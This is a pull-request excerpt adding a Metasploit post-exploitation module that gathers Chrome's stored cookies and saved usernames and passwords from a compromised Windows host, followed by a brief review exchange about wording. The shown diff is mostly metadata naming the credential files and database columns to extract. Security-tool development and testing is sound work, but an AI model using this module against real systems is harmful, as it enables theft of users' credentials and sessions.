modules/post/windows/gather/credentials/chrome.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  # this associative array defines the artifacts known to PackRat
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Packrat
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'Chrome credential gatherer',
+                      'Description' => %q{
+                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+      Further details can be found in the module documentation.
+      This is a module that searches for credentials stored on Chrome in a windows remote host.
+      },
+                      'License' => MSF_LICENSE,
+                      'Author' =>
+                        [
+                          'Kazuyoshi Maruta',
+                          'Daniel Hallsworth',
+                          'Barwar Salim M',
+                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+                        ],
+                      'Platform' => ['win'],
+                      'SessionTypes' => ['meterpreter'],
+                      'artifacts' =>
+                        {
+                          "application": "chrome",
+                          "app_category": "browsers",
+                          "gatherable_artifacts": [
+                            {
+                              "filetypes": "cookies",
+                              "path": "LocalAppData",
+                              "dir": "Google",
+                              "artifact_file_name": "Cookies",
+                              "description": "Chrome's Cookies",
+                              "credential_type": "sqlite",
+                              "sql_search": [
+                                {
+                                  "sql_description": "Database Commands which exports Chrome's Cookie data",
+                                  "sql_table": "cookiess",
+                                  "sql_column": "host_key, name, path"
+                                }
+                              ]
+                            },
+                            {
+                              "filetypes": "logins",
+                              "path": "LocalAppData",
+                              "dir": "Google",
+                              "artifact_file_name": "Login Data",
+                              "description": "Chrome's saved Username & Passwords",
```

Comment:
Just noticing the mixing of `&amp;` and `&` - what are your thoughts on aligning on one? Or maybe just using 'and' instead

Reply:
Hi @adfoster-r7 ,
Thank you for the suggestion. I have changed the  `&amp;` and `&` to use `and`. Changes were made at ba226cd2bdf374865fdacb7ac1e38c1749871662.